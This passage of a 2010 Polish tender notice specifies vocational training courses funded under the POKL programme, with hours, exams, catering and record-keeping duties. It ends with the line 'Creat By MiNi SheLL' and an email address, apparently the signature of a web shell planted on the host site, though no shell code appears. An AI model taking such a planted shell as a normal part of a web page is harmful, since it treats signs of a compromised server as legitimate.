 od VIII - X 2010 r.
2). Ilość  godzin  szkolenia   -  42 godziny po 45 minut zajęć obejmujących część  
teoretyczną oraz  praktyczną.
3).  Zajęcia powinny się odbywać nie częściej niż 2 razy w tygodniu.
4).  Wykonawca zapewnia: 
       - dostarczyć  program oraz harmonogram kursu
       - materiały dydaktyczne ( w tym dodatkowy egzemplarz do dokumentacji projektowej), 
       - przeprowadzenia badań niezbędnych do realizacji kursu
       - przeprowadzenie egzaminu URE
- opłacenie egzaminu URE
 - ubezpieczenie   uczestników  od  następstw  nieszczęśliwych wypadków  na okres trwania kursu
       - zwrotu kosztów dojazdu dla  uczestnika   kursu
       - przeprowadzenia    ankiet ewaluacyjnych : na rozpoczęcie kursu oraz po jego zakończeniu
      - na podstawie przeprowadzonych badań przygotowanie raportu ewaluacyjnego
      - wydanie  zaświadczeń  o ukończeniu kursu,
6).  Zaświadczenia certyfikaty,  materiały  dydaktyczne /szkoleniowe, program szkolenia -   
powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 -2013
     7). Wykonawca zapewnia także: catering obiadowy i kawowy 
     8). Zajęcia w ramach kursu realizują nauczyciele/instruktorzy Wykonawcy, posiadający odpowiednie kwalifikacje zawodowe.
     9). Wykonawca zobowiązuje się do prowadzenia dokumentacji kursu, tj. imienne listy  obecności  z  każdego dnia szkolenia,                    
 imienne listy potwierdzające odbiór cateringu obiadowego, imienne listy odbioru  
materiałów dydaktycznych / szkoleniowych, dzienniki zajęć, protokoły z egzaminów.   Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem    
kserokopie dokumentów.
   10). W przypadku rezygnacji któregoś z uczestników z udziału w projekcie Wykonawca   zapewni możliwość udziału w  kursie  osoby  przystępującej do projektu oraz zapewni możliwość uzupełnienia zaległości wynikających z wcześniejszych zajęć   przeprowadzonych w ramach kursu.
11)	  Wykonawca zobowiązuje się do zarejestrowania usługi szkoleniowej na stronie internetowej: www. inwestycja w kadry.pl
4. Kurs  zawodowy: Kierowca wózków jezdniowych z napędem silnikowym
 67godzin po 45 minut  2 osoby  
1)Realizacja  kursu Kierowca wózków jezdniowych z napędem silnikowym dla 2 osób odbywać się będzie w okresie od VIII - X 2010 r.
2)Ilość godzin szkolenia  -  67  godzin zajęć obejmujących część teoretyczną oraz praktyczną.
3)Zajęcia powinny się odbywać nie częściej niż 2 razy w tygodniu.
4)Wykonawca zapewnia: 
- dostarczyć program oraz harmonogram kursu
- materiały dydaktyczne ( w tym dodatkowy egzemplarz do dokumentacji projektowej), 
- przeprowadzenia badań niezbędnych do realizacji kursu
- przeprowadzenie egzaminu UDT
- ubezpieczenie uczestników od następstw  nieszczęśliwych wypadków  na okres trwania kursu
- zwrotu kosztów dojazdu dla uczestników kursu
- przeprowadzenia  ankiet ewaluacyjnych : na rozpoczęcie kursu oraz po jego zakończeniu
- na podstawie przeprowadzonych badań przygotowanie raportu ewaluacyjnego
-  wydanie zaświadczeń  o ukończeniu kursu,
5)Zaświadczenia certyfikaty, materiały  dydaktyczne/szkoleniowe, program szkolenia - powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 -2013
6)Wykonawca zapewnia także: catering obiadowy i kawowy 
7)Zajęcia w ramach kursu realizują nauczyciele/instruktorzy Wykonawcy, posiadający odpowiednie kwalifikacje zawodowe.
8)Wykonawca zobowiązuje się do prowadzenia dokumentacji kursu, tj. imienne listy obecności  z każdego dnia szkolenia, imienne listy potwierdzające odbiór cateringu obiadowego, imienne listy odbioru materiałów dydaktycznych / szkoleniowych, dzienniki zajęć, protokoły z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów.
9)W przypadku rezygnacji któregoś z uczestników z udziału w projekcie Wykonawca zapewni możliwość udziału w kursie  osoby  przystępującej do projektu oraz zapewni możliwość uzupełnienia zaległości wynikających z wcześniejszych zajęć przeprowadzonych w ramach szkolenia.
10)Wykonawca zobowiązuje się do zarejestrowania usługi szkoleniowej na stronie internetowej: www. inwestycja w kadry.pl
5. Kurs  zawodowy: Obsługa komputera, kas fiskalnych, urządzeń sklepowych        30 godzin po 45 minut / 4  osobowa  grupa
1)Realizacja  kursu Obsługa komputera, kas fiskalnych, urządzeń sklepowych
 dla 4 osób odbywać się będzie w okresie od VIII - X 2010 r.
2)Ilość godzin szkolenia  - 30 godzin zajęć obejmujących część teoretyczną oraz praktyczną.
3)Zajęcia powinny się odbywać nie częściej niż 2 razy w tygodniu.
4)Wykonawca zapewnia: 
- dostarczyć program oraz harmonogram kursu
- materiały dydaktyczne ( w tym dodatkowy egzemplarz do dokumentacji projektowej), 
- przeprowadzenia badań niezbędnych do realizacji kursu
- przeprowadzenie egzaminu
- ubezpieczenie uczestników od następstw  nieszczęśliwych wypadków  na okres trwania   kursu
- zwrotu kosztów dojazdu dla uczestników kursu
- przeprowadzenia  ankiet ewaluacyjnych : na rozpoczęcie kursu oraz po jego zakończeniu
- na podstawie przeprowadzonych badań przygotowanie raportu ewaluacyjnego
-  wydanie zaświadczeń  o ukończeniu kursu,
5)Zaświadczenia certyfikaty, materiały  dydaktyczne/szkoleniowe, program szkolenia - powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 -2013
6)Wykonawca zapewnia także: catering obiadowy i kawowy 
7)Zajęcia w ramach kursu realizują nauczyciele/instruktorzy Wykonawcy, posiadający odpowiednie kwalifikacje zawodowe.
8)Wykonawca zobowiązuje się do prowadzenia dokumentacji kursu, tj. imienne listy obecności  z każdego dnia szkolenia, imienne listy potwierdzające odbiór cateringu obiadowego, imienne listy odbioru materiałów dydaktycznych / szkoleniowych, dzienniki zajęć, protokoły z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów.
9)W przypadku rezygnacji któregoś z uczestników z udziału w projekcie Wykonawca zapewni możliwość udziału w kursie  osoby  przystępującej do projektu oraz zapewni możliwość uzupełnienia zaległości wynikających z wcześniejszych zajęć przeprowadzonych w ramach kursu.
10)Wykonawca zobowiązuje się do zarejestrowania usługi szkoleniowej na stronie internetowej: www. inwestycja w kadry.pl
6. Kurs  zawodowy: Kurs budowlany - technolog wykończenia wnętrz 
 80 godzin po 45 minut/ 2 osoby  
1)Realizacja  kursu Kurs budowlany - technolog wykończenia wnętrz  dla 2 osób  odbywać się będzie w okresie od VIII - X 2010 r.
2)Ilość godzin szkolenia  -  80 godzin zajęć obejmujących część teoretyczną oraz praktyczną.
3)Zajęcia powinny się odbywać nie częściej niż 2 razy w tygodniu.
4)Wykonawca zapewnia: 
- dostarczyć program oraz harmonogram kursu
- materiały dydaktyczne ( w tym dodatkowy egzemplarz do dokumentacji projektowej), 
- przeprowadzenia badań lekarskich niezbędnych do realizacji kursu
- przeprowadzenie egzaminu
- ubezpieczenie uczestników od następstw  nieszczęśliwych wypadków  na okres trwania   kursu
- zwrotu kosztów dojazdu dla uczestników kursu
- przeprowadzenia  ankiet ewaluacyjnych : na rozpoczęcie kursu oraz po jego zakończeniu
- na podstawie przeprowadzonych badań przygotowanie raportu ewaluacyjnego
-  wydanie zaświadczeń  o ukończeniu kursu,
5)Zaświadczenia certyfikaty, materiały  dydaktyczne/szkoleniowe, program szkolenia - powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 -2013
6)Organizator kursu zapewnia także: catering obiadowy i kawowy 
7)Zajęcia w ramach kursu realizują nauczyciele/instruktorzy Wykonawcy, posiadający odpowiednie kwalifikacje zawodowe.
8)Wykonawca zobowiązuje się do prowadzenia dokumentacji kursu, tj. imienne listy obecności  z każdego dnia szkolenia, imienne listy potwierdzające odbiór cateringu obiadowego, imienne listy odbioru materiałów dydaktycznych / szkoleniowych, dzienniki zajęć, protokoły z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów.
9)W przypadku rezygnacji któregoś z uczestników z udziału w projekcie Wykonawca zapewni możliwość udziału w kursie  osoby  przystępującej do projektu oraz zapewni możliwość uzupełnienia zaległości wynikających z wcześniejszych zajęć przeprowadzonych w ramach kursu.
10)Wykonawca zobowiązuje się do zarejestrowania usługi szkoleniowej na stronie internetowej: www. inwestycja w kadry.pl
7. Kurs  zawodowy: Dozór SEP bez ograniczenia napięcia  z  pomiarami
60 godzin po 45 minut/ 1 osoba  
1)Realizacja  kursu Dozór SEP bez ograniczenia napięcia  z  pomiarami  dla 1 osoby  odbywać się będzie w okresie od VIII - X 2010 r.
2)Ilość godzin szkolenia  -  60 godzin zajęć obejmujących część teoretyczną oraz praktyczną.
3)Zajęcia powinny się odbywać nie częściej niż 2 razy w tygodniu.
4)Wykonawca zapewnia: 
 - dostarczyć program oraz harmonogram kursu
- materiały dydaktyczne ( w tym dodatkowy egzemplarz do dokumentacji projektowej), 
- przeprowadzenia badań niezbędnych do realizacji kursu
- przeprowadzenie egzaminu URE
- opłacenia egzaminu URE
- ubezpieczenie uczestnika od następstw  nieszczęśliwych wypadków  na okres trwania  kursu
- zwrotu kosztów dojazdu dla uczestnika  kursu
- przeprowadzenia  ankiet ewaluacyjnych : na rozpoczęcie kursu oraz po jego zakończeniu
- na podstawie przeprowadzonych badań przygotowanie raportu ewaluacyjnego
-  wydanie zaświadczenia o ukończeniu kursu
5)Zaświadczenia certyfikaty, materiały  dydaktyczne/szkoleniowe, program szkolenia - powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 -2013
6)Wykonawca zapewnia także: catering obiadowy i kawowy 
7)Zajęcia w ramach kursu realizują nauczyciele/instruktorzy Wykonawcy, posiadający odpowiednie kwalifikacje zawodowe.
8)Wykonawca zobowiązuje się do prowadzenia dokumentacji kursu, tj. imienne listy obecności  z każdego dnia szkolenia, imienne listy potwierdzające odbiór cateringu obiadowego, imienne listy odbioru materiałów dydaktycznych / szkoleniowych, dzienniki zajęć, protokoły z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów.
9)W przypadku rezygnacji któregoś z uczestników z udziału w projekcie Wykonawca zapewni możliwość udziału w kursie  osoby  przystępującej do projektu oraz zapewni możliwość uzupełnienia zaległości wynikających z wcześniejszych zajęć przeprowadzonych w ramach kursu.
10)Wykonawca zobowiązuje się do zarejestrowania usługi szkoleniowej na stronie internetowej: www. inwestycja w kadry.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com